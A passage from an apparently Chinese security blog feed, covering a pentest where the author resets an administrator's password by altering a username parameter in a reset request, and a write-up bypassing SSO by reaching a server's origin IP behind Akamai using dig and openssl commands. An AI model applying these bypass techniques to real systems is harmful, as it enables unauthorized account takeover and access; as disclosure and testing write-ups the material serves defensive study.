src="https://wechat2rss.xlab.app/img-proxy/?k=99bf569c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPWic1WZLib9O7VPzsMqhiahAr63u0qFoPq7vFIJcNBpZSGIA1Bu1zKTlyEypqNUXPRZUwdqNRmsIDEbFRMMVPUoAKmJL1QKAeG0bU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">轻轻松松，emmmm，看到这里，基本可以预估漏洞跑不掉了，试试看，输入任意密码，直接点击重置，抓包如下。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001958" data-ratio="0.6448979591836734" data-s="300,640" type="block" data-type="png" data-w="980" src="https://wechat2rss.xlab.app/img-proxy/?k=cf44b586&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F72I8gAalpPUyA0WYSG1VKBZDFoT1dCfHhV9y5lPDQUZSUOax7ocX3bb5FL2ZvYBokQWmOeX9q7Qk93PCmJUia6ZSmGmFVgo4TQ4VZmw0uk80%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">我就知道，这种场景基本上很大可能会存在，很少有会基于这个条件判断加一个凭证校验的，毕竟开发大佬主打的还是简单为主。直接修改USERNAME为admin，emmmm再次成功修改管理员密码。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001959" data-ratio="0.38055555555555554" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e7cba12e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F72I8gAalpPUtic5M6uVxZCUPMXLoskE1Ic2jA6s6SNxH4UCAYHJcEfTBNmZX7EwmicnSe8yI8oLtZaznKvk4NX7HxCyFf0J1J23oumtxyGJKM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">使用修改后的密码成功登录系统。</span></p><p style="text-align: center;margin-bottom: 24px;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100001960" data-ratio="0.16445623342175067" data-s="300,640" type="block" data-type="png" data-w="754" src="https://wechat2rss.xlab.app/img-proxy/?k=ad099164&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F72I8gAalpPW1t61Liarjbp5O6138h4vpevXlOqCOOHXwiaALxyhU4Myibd4fVNicfe4ia3p8Akr9KTMap0ZT7fiaXpVVBUxXfutZPVNyZGSAUiaDicI%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-indent: 2em;margin-bottom: 24px;"><span leaf="">emmmm，梅开二度，赶紧写完报告交付给客户。</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100012574" data-ratio="0.5493333333333333" data-s="300,640" data-w="750" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">‍</a></span></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7e8f6343&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzIzMTIzNTM0MA%3D%3D%26mid%3D2247499435%26idx%3D1%26sn%3D18c09fc83c9eb4d4c421cec6644fccb6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 13 May 2026 10:00:00 +0800</pubDate>
    </item>
    <item>
      <title>权限绕过</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247499431&amp;idx=1&amp;sn=0ddec433ea7ac571491c0cb05a89baca</link>
      <description></description>
      <content:encoded><![CDATA[<p>原创 <span>h1</span> <span>2026-05-12 10:03</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=da9150b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F7xtecWUgCRwzy0gMYl32S6pq4nAsibaAvZmuqFN8Gr2rc4AW3unoLN312rqYEhCKGrX2xkWL3zRHNR8JTiaP9lxZOhGrBDYJWRkPdUicWmR8W4%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">权限绕过</span></p><h2 data-cacheurl="" data-remoteid="" style="box-sizing: border-box;margin: 30px 0px 15px;color: rgba(0, 0, 0, 0.85);font-weight: 500;cursor: pointer;padding: 0px;background: none center center / 63px no-repeat scroll padding-box border-box rgb(255, 255, 255);width: auto;height: auto;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;justify-content: center;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=552b1157&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F7xtecWUgCRzicBHAXKDUpia6feCSZxIDoPXIXCE4C0JWABkBUSX8DCUllDibX4YUhLG80JaEUPmeyePFgZYQrwCMb6sPM5m3rQp8fkO6palv8k%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><span style="box-sizing: border-box;cursor: pointer;font-size: 18px;color: rgb(72, 179, 120);line-height: 2.4em;letter-spacing: 0em;margin: 38px 0px 10px;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;align-items: unset;background: none 0% 0% / auto no-repeat scroll padding-box border-box transparent;box-shadow: none;content: unset;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: 38px;justify-content: unset;overflow: unset;padding: 0px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span leaf="">正文</span></span></h2><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">正文 主机使用Akamai作为负载均衡器，并将流量路由到内部服务器：</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">root@doggos:~</span><span style="box-sizing: border-box;color: rgb(92, 99, 112);font-style: italic;cursor: pointer;line-height: 26px;"><span leaf=""># dig A ████</span></span><span leaf=""><br/></span><span leaf="">-- snip --</span><span leaf=""><br/></span><span leaf="">;; ANSWER SECTION:</span><span leaf=""><br/></span><span leaf="">███. 2386 IN CNAME █████.</span><span leaf=""><br/></span><span leaf="">████. 1554 IN CNAME ███.</span><span leaf=""><br/></span><span leaf="">███████. 180 IN CNAME e1010.d.akamaiedge.akamai.█████████.</span><span leaf=""><br/></span><span leaf="">e1010.d.akamaiedge.akamai.██████. 20 IN A ██████████</span><span leaf=""><br/></span><span leaf="">~</span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">访问该网站时，您会被重定向到<a href="https://█████████/pool/sso/authenticate/l/2?m=GET&amp;r=t&amp;u=https%3A%2F%2F████████%2F，要求访问者通过SSO进行身份验证。然而，我能够找到此服务器的原始IP地址。访问此原始IP会完全绕过██████████" target="_blank">https://█████████/pool/sso/authenticate/l/2?m=GET&amp;r=t&amp;u=https%3A%2F%2F████████%2F，要求访问者通过SSO进行身份验证。然而，我能够找到此服务器的原始IP地址。访问此原始IP会完全绕过██████████</a> SSO，使访问者能够以认证用户身份使用该应用程序。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">使用以下命令验证██████是否为██████████的原始IP地址，通过从SSL证书中提取名称</span></p><pre style="box-sizing: border-box;font-size: 16px;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, Courier, monospace;margin: 10px 0px;overflow: auto;cursor: pointer;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;padding: 0px;color: rgb(0, 0, 0);font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><code style="box-sizing: border-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);cursor: pointer;border-radius: 5px;"><span leaf="">root@doggos:~</span><span style="box-sizing: border-box;color: rgb(92, 99, 112);font-style: italic;cursor: pointer;line-height: 26px;"><span leaf=""># true | openssl s_client -connect ██████:443 2&gt;/dev/null | openssl x509 -noout -text | perl -l -0777 -ne &#39;@names=/\bDNS:([^\s,]+)/g; print join(&#34;\n&#34;, sort @names);&#39;</span></span></code></pre><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">思路分析:</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第一步： 访问应用时会被重定向到SSO认证页面。攻击者无法直接访问应用内容。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第二步： 通过使用dig命令查找DNS记录，攻击者发现了该服务器的原始IP地址。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第三步： 使用openssl s_client命令从SSL证书中提取服务器的DNS名称，确认该IP确实是原始IP。</span></p><p style="box-sizing: border-box;margin: 0px;cursor: pointer;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;text-align: left;text-indent: 0px;padding: 16px 0px 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">第四步： 直接访问此原始IP地址，绕过了SSO认证，成功以认证用户身份访问了应用程序。</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf="">如果你是一个长期主义者，欢迎加入我的知识星球，本星球日日更新,包含号主大量一线实战,全网独一无二，微信识别二维码付费即可加入，如不满意，72 小时内可在 App 内无条件自助退款</span></p><p style="text-align: center;" data-pm-slice="2 2 []"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5493333333333333" data-s="300,640" data-type="png" data-w="750" data-imgfileid="100012574" src="https://wechat2rss.xlab.app/img-proxy/?k=033161f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FYmmVSe19Qj5EMr3X76qdKBrhIIkBlVVyuiaiasseFZ9LqtibyKFk7gXvgTU2C2yEwKLaaqfX0DL3eoH6gTcNLJvDQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p><span style="box-sizing: border-box;text-align: center;display: inline-block;height: 38px;line-height: 42px;color: rgb(72, 179, 120);background-position: left center;background-repeat: no-repeat;background-attachment: initial;background-origin: initial;background-clip: initial;background-size: 63px;margin-top: 38px;font-size: 18px;margin-bottom: 10px;"><span leaf="">往期回顾</span></span></p><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497813&amp;idx=1&amp;sn=c778ad6a4bffd7a0a72a900144ea90ca&amp;scene=21#wechat_redirect" textvalue="如何利用ai辅助挖漏洞" data-itemshowtype="0" linktype="text" data-linktype="2">如何利用ai辅助挖漏洞</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497880&amp;idx=1&amp;sn=b9b980464333074216b55ea94c8a743a&amp;scene=21#wechat_redirect" textvalue="如何在移动端抓包-下" data-itemshowtype="0" linktype="text" data-linktype="2">如何在移动端抓包-下</a></span></h1><h1 data-pm-slice="0 0 []"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;h1&#34;,&#34;attributes&#34;:{&#34;id&#34;:&#34;activity-name&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247497491&amp;idx=1&amp;sn=a1b00b9a8a54eb96aa3ba8bf23cb7e28&amp;scene=21#wechat_redirect" textvalue="如何绕过签名校验" data-itemshowtype="0" linktype="text" data-linktype="2">如何绕过签名校验</a></span></h1><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495880&amp;idx=1&amp;sn=65d42fbff5e198509e55072674ac5283&amp;chksm=e8a5faabdfd273bd55df8f7db3d644d3102d7382020234741e37ca29e963eace13dd17fcabdd&amp;scene=21#wechat_redirect" textvalue="一款bp神器" data-itemshowtype="0" linktype="text" data-linktype="2">一款bp神器</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496898&amp;idx=1&amp;sn=b6088e20a8b4fc9fbd887b900d8c5247&amp;scene=21#wechat_redirect" textvalue="挖掘有回显ssrf的隐藏payload" data-itemshowtype="0" linktype="text" data-linktype="2">挖掘有回显ssrf的隐藏payload</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247495841&amp;idx=1&amp;sn=bbf477afa30391b8072d23469645d026&amp;chksm=e8a5fac2dfd273d42344f18c7c6f0f7a158cca94041c4c4db330c3adf2d1f77f062dcaf6c5e0&amp;scene=21#wechat_redirect" textvalue="ssrf绕过新思路" data-itemshowtype="0" linktype="text" data-linktype="2">ssrf绕过新思路</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247496380&amp;idx=1&amp;sn=78c0c4c67821f5ecbe4f3947b567eeec&amp;chksm=e8a5f8dfdfd271c935aeb4444ea7e928c55cb4c823c51f1067f267699d71a1aad086cf203b99&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">一个辅助测试ssrf的工具</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247488819&amp;idx=1&amp;sn=5141f88f3e70b9c97e63a4b68689bf6e&amp;chksm=e8a61f50dfd1964692f93412f122087ac160b743b4532ee0c1e42a83039de62825ebbd066a1e&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">dom-xss精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487187&amp;idx=1&amp;sn=622438ee6492e4c639ebd8500384ab2f&amp;chksm=e8a604b0dfd18da6c459b4705abd520cc2259a607dd9306915d845c1965224cc117207fc6236&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">年度精选文章</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247487122&amp;idx=1&amp;sn=32459310408d126aa43240673b8b0846&amp;chksm=e8a604f1dfd18de737769dd512ad4063a3da328117b8a98c4ca9bc5b48af4dcfa397c667f4e3&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">Nuclei权威指南-如何躺赚</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486973&amp;idx=1&amp;sn=6ec419db11ff93d30aa2fbc04d8dbab6&amp;chksm=e8a6079edfd18e88f6236e237837ee0d1101489d52f2abb28532162e2937ec4612f1be52a88f&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试设置功能IV</a></span></p><p><span leaf=""><a class="normal_text_link" target="_blank" style="" href="http://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&amp;mid=2247486764&amp;idx=1&amp;sn=9f78d4c937675d76fb94de20effdeb78&amp;chksm=e8a6074fdfd18e59126990bc3fcae300cdac492b374ad3962926092aa0074c3ee0945a31aa8a&amp;scene=21#wechat_redirect" textvalue="" data-itemshowtype="0" linktype="text" data-linktype="2">漏洞赏金猎人系列-如何测试注册功能以及相关Tips</a></span><span style="display: none;line-height: 0px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" 